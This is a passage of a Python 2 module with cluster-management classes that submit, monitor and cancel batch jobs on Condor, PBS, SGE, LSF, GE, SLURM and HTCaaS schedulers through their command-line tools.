dico = {'prog': prog, 'cwd': cwd, 'stdout': stdout,
'stderr': stderr,'log': log,'argument': argument,
'requirement': requirement, 'input_files':input_files,
'output_files':output_files}
#open('submit_condor','w').write(text % dico)
a = subprocess.Popen(['condor_submit'], stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
output, _ = a.communicate(text % dico)
#output = a.stdout.read()
#Submitting job(s).
#Logging submit event(s).
#1 job(s) submitted to cluster 2253622.
pat = re.compile("submitted to cluster (\d*)",re.MULTILINE)
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try(nb_try=10, sleep=10)
def control_one_job(self, id):
"""Control the status of a single job from its cluster id."""
cmd = 'condor_q '+str(id)+" -format \'%-2s \\n\' \'ifThenElse(JobStatus==0,\"U\",ifThenElse(JobStatus==1,\"I\",ifThenElse(JobStatus==2,\"R\",ifThenElse(JobStatus==3,\"X\",ifThenElse(JobStatus==4,\"C\",ifThenElse(JobStatus==5,\"H\",ifThenElse(JobStatus==6,\"E\",string(JobStatus))))))))\'"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read()
if status.returncode or error:
raise ClusterManagmentError, 'condor_q returns error: %s' % error
return status.stdout.readline().strip()
@check_interupt()
@multiple_try(nb_try=10, sleep=10)
def control(self, me_dir):
"""Check the status of all jobs associated with me_dir.
Return (idle, run, finish, fail)."""
if not self.submitted_ids:
return 0, 0, 0, 0
packet = 15000
idle, run, fail = 0, 0, 0
ongoing = []
for i in range(1+(len(self.submitted_ids)-1)//packet):
start = i * packet
stop = (i+1) * packet
cmd = "condor_q " + ' '.join(self.submitted_ids[start:stop]) + \
" -format \'%-2s \' \'ClusterId\' " + \
" -format \'%-2s \\n\' \'ifThenElse(JobStatus==0,\"U\",ifThenElse(JobStatus==1,\"I\",ifThenElse(JobStatus==2,\"R\",ifThenElse(JobStatus==3,\"X\",ifThenElse(JobStatus==4,\"C\",ifThenElse(JobStatus==5,\"H\",ifThenElse(JobStatus==6,\"E\",string(JobStatus))))))))\'"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read()
if status.returncode or error:
raise ClusterManagmentError, 'condor_q returns error: %s' % error
for line in status.stdout:
id, status = line.strip().split()
ongoing.append(int(id))
if status in ['I','U']:
idle += 1
elif status == 'R':
run += 1
elif status != 'C':
fail += 1
for id in list(self.submitted_ids):
if int(id) not in ongoing:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster."""
if not self.submitted_ids:
return
cmd = "condor_rm %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
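# --- Hedged note (not part of the original module) -----------------------------
# The condor_q -format expression above maps Condor's numeric JobStatus onto
# single-letter codes; control() then counts 'I'/'U' as idle, 'R' as running,
# 'C' as completed and anything else as failed. Collected here only for
# readability; this dict is not used by the class itself.
CONDOR_STATUS_LETTERS = {0: 'U', 1: 'I', 2: 'R', 3: 'X', 4: 'C', 5: 'H', 6: 'E'}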
class PBSCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'pbs'
job_id = 'PBS_JOBID'
idle_tag = ['Q']
running_tag = ['T','E','R']
complete_tag = ['C']
maximum_submited_jobs = 2500
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a PBS cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if len(self.submitted_ids) > self.maximum_submited_jobs:
fct = lambda idle, run, finish: logger.info('Waiting for free slot: %s %s %s' % (idle, run, finish))
self.wait(me_dir, fct, self.maximum_submited_jobs)
text = ""
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s;" % cwd
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
if not os.path.isabs(prog):
text += "./%s" % prog
else:
text+= prog
if argument:
text += ' ' + ' '.join(argument)
command = ['qsub','-o', stdout,
'-N', me_dir,
'-e', stderr,
'-V']
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text)[0]
id = output.split('.')[0]
if not id.isdigit() or a.returncode !=0:
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
"""Control the status of a single job from its cluster id."""
cmd = 'qstat '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
for line in status.stdout:
line = line.strip()
if 'cannot connect to server' in line or 'cannot read reply' in line:
raise ClusterManagmentError, 'server disconnected'
if 'Unknown' in line:
return 'F'
elif line.startswith(str(id)):
jobstatus = line.split()[4]
else:
jobstatus=""
if status.returncode != 0 and status.returncode is not None:
raise ClusterManagmentError, 'server fails in someway (errorcode %s)' % status.returncode
if jobstatus in self.idle_tag:
return 'I'
elif jobstatus in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
"""Check the status of all jobs associated with me_dir.
Return (idle, run, finish, fail)."""
cmd = "qstat"
status = misc.Popen([cmd], stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
ongoing = []
idle, run, fail = 0, 0, 0
for line in status.stdout:
if 'cannot connect to server' in line or 'cannot read reply' in line:
raise ClusterManagmentError, 'server disconnected'
if me_dir in line:
ongoing.append(line.split()[0].split('.')[0])
status2 = line.split()[4]
if status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
if not self.check_termination(line.split()[0].split('.')[0]):
idle += 1
else:
fail += 1
if status.returncode != 0 and status.returncode is not None:
raise ClusterManagmentError, 'server fails in someway (errorcode %s)' % status.returncode
for id in list(self.submitted_ids):
if id not in ongoing:
status2 = self.check_termination(id)
if status2 == 'wait':
run += 1
elif status2 == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class SGECluster(Cluster):
"""Basic class for dealing with cluster submission"""
# Class written by Arian Abrahantes.
name = 'sge'
job_id = 'JOB_ID'
idle_tag = ['qw', 'hqw','hRqw','w']
running_tag = ['r','t','Rr','Rt']
identifier_length = 10
def def_get_path(self,location):
"""Normalize a path, replacing the home directory with $HOME."""
location = os.path.realpath(location)
homePath = os.getenv("HOME")
if homePath:
location = location.replace(homePath,'$HOME')
return location
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to an SGE cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if cwd is None:
#cwd = os.getcwd()
cwd = self.def_get_path(os.getcwd())
cwd1 = self.def_get_path(cwd)
text = " cd %s;" % cwd1
if stdout is None:
stdout = '/dev/null'
else:
stdout = self.def_get_path(stdout)
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
else:
stderr = self.def_get_path(stderr)
if log is None:
log = '/dev/null'
else:
log = self.def_get_path(log)
text += prog
if argument:
text += ' ' + ' '.join(argument)
#if anything slips through argument
#print "!=== inteded change ",text.replace('/srv/nfs','')
#text = text.replace('/srv/nfs','')
homePath = os.getenv("HOME")
if homePath:
text = text.replace(homePath,'$HOME')
logger.debug("!=== input %s" % text)
logger.debug("!=== output %s" % stdout)
logger.debug("!=== error %s" % stderr)
logger.debug("!=== logs %s" % log)
command = ['qsub','-o', stdout,
'-N', me_dir,
'-e', stderr,
'-V']
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text)[0]
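# qsub normally replies with something like: Your job <id> ("<name>") has been submitted,
# so the job id is taken as the third whitespace-separated token below.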
id = output.split(' ')[2]
if not id.isdigit():
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
logger.debug(output)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
#cmd = 'qstat '+str(id)
cmd = 'qstat '
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
#print "!==",line
#line = line.strip()
#if 'Unknown' in line:
# return 'F'
#elif line.startswith(str(id)):
# status = line.split()[4]
if str(id) in line:
status = line.split()[4]
#print "!=status", status
if status in self.idle_tag:
return 'I'
elif status in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "qstat "
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
finished = list(self.submitted_ids)
idle, run, fail = 0, 0, 0
for line in status.stdout:
if me_dir in line:
id,_,_,_,status = line.split()[:5]
if status in self.idle_tag:
idle += 1
finished.remove(id)
elif status in self.running_tag:
run += 1
finished.remove(id)
else:
logger.debug(line)
fail += 1
finished.remove(id)
for id in finished:
self.check_termination(id)
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class LSFCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'lsf'
job_id = 'LSB_JOBID'
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit the job prog to an LSF cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
text = ""
command = ['bsub', '-C0', '-J', me_dir]
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s;" % cwd
if stdout and isinstance(stdout, str):
command.extend(['-o', stdout])
if stderr and isinstance(stderr, str):
command.extend(['-e', stderr])
elif stderr == -2: # -2 is subprocess.STDOUT
pass
if log is None:
log = '/dev/null'
text += prog
if argument:
text += ' ' + ' '.join(argument)
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text)[0]
#Job <nnnn> is submitted to default queue <normal>.
try:
id = output.split('>',1)[0].split('<')[1]
except:
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
if not id.isdigit():
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'bjobs '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
line = line.strip().upper()
if 'JOBID' in line:
continue
elif str(id) not in line:
continue
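# bjobs reports the job state in its third column (STAT), e.g. PEND, RUN, DONE or EXIT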
status = line.split()[2]
if status == 'RUN':
return 'R'
elif status == 'PEND':
return 'I'
elif status == 'DONE':
return 'F'
else:
return 'H'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
return 0, 0, 0, 0
cmd = "bjobs " + ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
jobstatus = {}
for line in status.stdout:
line = line.strip()
if 'JOBID' in line:
continue
splitline = line.split()
id = splitline[0]
if id not in self.submitted_ids:
continue
jobstatus[id] = splitline[2]
idle, run, fail = 0, 0, 0
for id in self.submitted_ids[:]:
if id in jobstatus:
status = jobstatus[id]
else:
status = 'MISSING'
if status == 'RUN':
run += 1
elif status == 'PEND':
idle += 1
else:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args,**opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "bkill %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class GECluster(Cluster):
"""Class for dealing with cluster submission on a GE cluster"""
name = 'ge'
job_id = 'JOB_ID'
idle_tag = ['qw']
running_tag = ['r']
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a GE cluster"""
text = ""
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s; bash " % cwd
if stdout is None:
stdout = os.path.join(cwd, "log.%s" % prog.split('/')[-1])
if stderr is None:
stderr = os.path.join(cwd, "err.%s" % prog.split('/')[-1])
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
text += prog
if argument:
text += ' ' + ' '.join(argument)
text += '\n'
tmp_submit = os.path.join(cwd, 'tmp_submit')
open(tmp_submit,'w').write(text)
a = misc.Popen(['qsub','-o', stdout,
'-e', stderr,
tmp_submit],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate()[0]
#Your job 874511 ("test.sh") has been submitted
pat = re.compile("Your job (\d*) \(",re.MULTILINE)
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'qstat | grep '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
if not status:
return 'F'
#874516 0.00000 test.sh alwall qw 03/04/2012 22:30:35 1
pat = re.compile("^(\d+)\s+[\d\.]+\s+[\w\d\.]+\s+[\w\d\.]+\s+(\w+)\s")
stat = ''
for line in status.stdout.read().split('\n'):
if not line:
continue
line = line.strip()
try:
groups = pat.search(line).groups()
except:
raise ClusterManagmentError, 'bad syntax for stat: \n\"%s\"' % line
if groups[0] != id: continue
stat = groups[1]
if not stat:
return 'F'
if stat in self.idle_tag:
return 'I'
if stat in self.running_tag:
return 'R'
@multiple_try()
def control(self, me_dir=None):
"""Check the status of job associated to directory me_dir. return (idle, run, finish, fail)"""
if not self.submitted_ids:
return 0, 0, 0, 0
idle, run, fail = 0, 0, 0
ongoing = []
for statusflag in ['p', 'r', 'sh']:
cmd = 'qstat -s %s' % statusflag
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
#874516 0.00000 test.sh alwall qw 03/04/2012 22:30:35 1
pat = re.compile("^(\d+)")
for line in status.stdout.read().split('\n'):
line = line.strip()
try:
id = pat.search(line).groups()[0]
except Exception:
pass
else:
if id not in self.submitted_ids:
continue
ongoing.append(id)
if statusflag == 'p':
idle += 1
if statusflag == 'r':
run += 1
if statusflag == 'sh':
fail += 1
for id in list(self.submitted_ids):
if id not in ongoing:
self.check_termination(id)
#self.submitted_ids = ongoing
return idle, run, self.submitted - idle - run - fail, fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
def asyncrone_launch(exe, cwd=None, stdout=None, argument = [], **opt):
"""start a computation and not wait for it to finish.
this fonction returns a lock which is locked as long as the job is
running."""
mc = MultiCore(1)
mc.submit(exe, argument, cwd, stdout, **opt)
mc.need_waiting = True
return mc.lock
class SLURMCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'slurm'
job_id = 'SLURM_JOBID'
idle_tag = ['Q','PD','S','CF']
running_tag = ['R', 'CG']
complete_tag = ['C']
identifier_length = 8
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a SLURM cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
command = ['sbatch', '-o', stdout,
'-J', me_dir,
'-e', stderr, prog] + argument
if self.cluster_queue and self.cluster_queue != 'None':
command.insert(1, '-p')
command.insert(2, self.cluster_queue)
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate()
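# sbatch normally prints "Submitted batch job <id>", so the id is expected to be
# the fourth whitespace-separated token of its stdout.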
output_arr = output[0].split(' ')
id = output_arr[3].rstrip()
if not id.isdigit():
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% (output[0] + '\n' + output[1])
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'squeue -j '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=open(os.devnull,'w'))
for line in status.stdout:
line = line.strip()
if 'Invalid' in line:
return 'F'
elif line.startswith(str(id)):
status = line.split()[4]
if status in self.idle_tag:
return 'I'
elif status in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "squeue"
pstatus = misc.Popen([cmd], stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
idle, run, fail = 0, 0, 0
ongoing=[]
for line in pstatus.stdout:
if me_dir in line:
id, _, _,_ , status,_ = line.split(None,5)
ongoing.append(id)
if status in self.idle_tag:
idle += 1
elif status in self.running_tag:
run += 1
elif status in self.complete_tag:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
else:
fail += 1
#control other finished job
for id in list(self.submitted_ids):
if id not in ongoing:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "scancel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class HTCaaSCluster(Cluster):
"""Class for dealing with cluster submission on a HTCaaS cluster using GPFS """
name= 'htcaas'
job_id = 'HTCAAS_JOBID'
idle_tag = ['waiting']
running_tag = ['preparing','running']
complete_tag = ['done']
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the HTCaaS job on the cluster with NO SHARE DISK
input/output file should be given as relative to CWd
"""
# To make workspace name(temp)
cur_usr = os.getenv('USER')
if cwd is None:
cwd = os.getcwd()
cwd_cp = cwd.rsplit("/",2)
if not stdout is None:
print "stdout: %s" % stdout
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if not required_output and output_files:
required_output = output_files
logger.debug(prog)
if 'combine' not in prog and 'pythia' not in prog and 'shower' not in prog :
cwd_arg = cwd+"/arguments"
temp = ' '.join([str(a) for a in argument])
arg_cmd="echo '"+temp+"' > " + cwd_arg
command = ['htcaas-mgjob-submit','-d',cwd,'-e',os.path.basename(prog)]
if argument :
command.extend(['-a ', '='.join([str(a) for a in argument])])
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
else:
cwd_arg = cwd+"/arguments"
temp = ' '.join([str(a) for a in argument])
temp_file_name = "sub." + os.path.basename(prog)
text = """#!/bin/bash
MYPWD=%(cwd)s
cd $MYPWD
input_files=(%(input_files)s )
for i in ${input_files[@]}
do
chmod -f +x $i
done
/bin/bash %(prog)s %(arguments)s > %(stdout)s
"""
dico = {'cwd':cwd, 'input_files': ' '.join(input_files + [prog]), 'stdout': stdout, 'prog':prog,
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
command = ['htcaas-mgjob-submit','-d',cwd,'-e',temp_file_name]
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
logger.debug(id)
nb_try=0
nb_limit=5
if not id.isdigit() :
print "[ID is not digit]:" + id
while not id.isdigit() :
nb_try+=1
print "[fail_retry]:"+ nb_try
a=misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
if nb_try > nb_limit :
raise ClusterManagmentError, 'fail to submit to the HTCaaS cluster: \n %s' % id
break
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try(nb_try=10, sleep=5)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
if id == 0 :
status_out ='C'
else :
cmd = 'htcaas-job-status -m '+str(id)+ " -s | grep Status "
status = misc.Popen([cmd], shell=True,stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read()
if status.returncode or error:
raise ClusterManagmentError, 'htcaas-job-submit returns error: %s' % error
status_out= status.stdout.read().strip()
status_out= status_out.split(":",1)[1]
if status_out == 'waiting':
status_out='I'
elif status_out == 'preparing' or status_out == 'running':
status_out = 'R'
elif status_out != 'done':
status_out = 'F'
elif status_out == 'done':
status_out = 'C'
return status_out
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
logger.debug("self.submitted_ids not exists")
return 0, 0, 0, 0
ongoing = []
idle, run, fail = 0, 0, 0
start = self.submitted_ids[0]
end = self.submitted_ids[-1]
cmd = "htcaas-job-status -c "+str(start)+"-"+str(end)#+" -ac"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
#ongoing.append(line.split()[0].strip())
status2 = line.split()[-1]
if status2 != 'null' or line.split()[0].strip() != '0':
ongoing.append(line.split()[0].strip())
logger.debug("["+line.split()[0].strip()+"]"+status2)
if status2 == 'null' or line.split()[0].strip() == '0':
idle += 1
elif status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
if not self.check_termination(line.split()[0]):
idle +=1
else:
fail += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
for i in range(len(self.submitted_ids)):
cmd = "htcaas-job-cancel -m %s" % self.submitted_ids[i]
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
class HTCaaS2Cluster(Cluster):
"""Class for dealing with cluster submission on a HTCaaS cluster without GPFS """
name= 'htcaas2'
job_id = 'HTCAAS2_JOBID'
idle_tag = ['waiting']
running_tag = ['preparing','running']
complete_tag = ['done']
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the HTCaaS job on the cluster with NO SHARE DISK
input/output file should be given as relative to CWD
"""
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if 'combine' not in prog and 'pythia' not in prog and 'shower' not in prog :
if cwd or prog :
self.submitted_dirs.append(cwd)
self.submitted_exes.append(prog)
else:
logger.debug("cwd and prog not exist->"+cwd+" / "+ os.path.basename(prog))
if argument :
self.submitted_args.append('='.join([str(a) for a in argument]))
if cwd or prog :
self.submitted += 1
id = self.submitted
self.submitted_ids.append(id)
else:
logger.debug("cwd and prog are not exist! ")
id = 0
else:
temp_file_name = "sub."+ os.path.basename(prog)
text = """#!/bin/bash
MYPWD=%(cwd)s
cd $MYPWD
input_files=(%(input_files)s )
for i in ${input_files[@]}
do
chmod -f +x $i
done
/bin/bash %(prog)s %(arguments)s > %(stdout)s
"""
dico = {'cwd':cwd, 'input_files': ' '.join(input_files + [prog]), 'stdout': stdout, 'prog':prog,
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
command = ['htcaas-mgjob-submit','-d',cwd,'-e',new_prog]
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
logger.debug("[mode2]-["+str(id)+"]")
if cwd and prog :
self.submitted += 1
self.submitted_ids.append(id)
else:
logger.debug("cwd and prog are not exist! ")
id = 0
return id
@multiple_try()
def metasubmit(self, me_dir=None):
if self.submitted > 1100 and self.submitted == len(self.submitted_ids):
tmp_leng= len(self.submitted_ids)/2
tmp_dirs1= self.submitted_dirs[0:tmp_leng]
tmp_dirs2= self.submitted_dirs[tmp_leng:]
tmp_exes1= self.submitted_exes[0:tmp_leng]
tmp_exes2= self.submitted_exes[tmp_leng:]
command1 = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in tmp_dirs1 if a and a != ' ']),
'-e', ":".join([str(a) for a in tmp_exes1 if a and a != ' '])]
command2 = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in tmp_dirs2 if a and a != ' ']),
'-e', ":".join([str(a) for a in tmp_exes2 if a and a != ' '])]
if len(self.submitted_args) > 0 :
tmp_args1= self.submitted_args[0:tmp_leng]
tmp_args2= self.submitted_args[tmp_leng:]
command1.extend(['-a', ':'.join([str(a) for a in tmp_args1])])
command2.extend(['-a', ':'.join([str(a) for a in tmp_args2])])
result1 = misc.Popen(command1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
result2 = misc.Popen(command2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
me_dir = str(result1.stdout.read().strip())+ "//" + str(result2.stdout.read().strip())
elif self.submitted > 0 and self.submitted == self.submitted_ids[-1]:
command = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in self.submitted_dirs if a and a != ' ']),
'-e', ":".join([str(a) for a in self.submitted_exes if a and a != ' '])]
if len(self.submitted_args) > 0 :
command.extend(['-a', ':'.join([str(a) for a in self.submitted_args])])
if self.submitted_dirs[0] or self.submitted_exes[0] :
result = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
me_dir = result.stdout.read().strip()
self.submitted_ids[0]=me_dir
else:
me_dir = self.submitted_ids[-1]
elif self.submitted > 0 and self.submitted != self.submitted_ids[-1]:
me_dir = self.submitted_ids[0]
else:
me_dir = -1
logger.debug("[" + str(me_dir) + "]")
self.submitted_dirs = []
self.submitted_exes = []
self.submitted_args = []
return me_dir
@multiple_try(nb_try=10, sleep=5)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
#logger.debug("CONTROL ONE JOB MODE")
if self.submitted == self.submitted_ids[-1] :
id = self.metasubmit(self)
tempid = self.submitted_ids[-1]
self.submitted_ids.remove(self.submitted_ids[-1])
self.submitted_ids.append(id)
logger.debug(str(id)+" // "+str(self.submitted_ids[-1]))
if id == 0 :
status_out ='C'
else:
cmd = 'htcaas-job-status -m '+ str(id) + " -s | grep Status "
status = misc.Popen([cmd],shell=True,stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read()
if status.returncode or error:
raise ClusterManagmentError, 'htcaas-job-status returns error: %s' % error
status_out= status.stdout.read().strip()
status_out= status_out.split(":",1)[1]
logger.debug("[["+str(id)+"]]"+status_out)
if status_out == 'waiting':
status_out='I'
elif status_out == 'preparing' or status_out == 'running':
status_out = 'R'
elif status_out != 'done':
status_out = 'F'
elif status_out == 'done':
status_out = 'C'
self.submitted -= 1
return status_out
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
logger.debug("self.submitted_ids not exists")
return 0, 0, 0, 0
if "//" in me_dir :
if int(me_dir.split("//")[0]) < int(me_dir.split("//")[1]) :
start = me_dir.split("//")[0]
end = me_dir.split("//")[1]
else :
start = me_dir.split("//")[1]
end = me_dir.split("//")[0]
elif "/" in me_dir : # update
start = 0
end = 0
elif me_dir.isdigit():
start = me_dir
end = me_dir
elif not me_dir.isdigit():
me_dir = self.submitted_ids[0]
logger.debug("Meta_ID is not digit(control), self.submitted_ids[0]: "+str(me_dir) )
ongoing = []
idle, run, fail, done = 0, 0, 0, 0
cmd = "htcaas-job-status -c "+str(start)+"-"+str(end) +" -ac"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
status2 = line.split()[-1]
if status2 != 'null' or line.split()[0].strip() != '0':
ongoing.append(str(line.split()[0].strip())+"-"+str(line.split()[1].strip()))
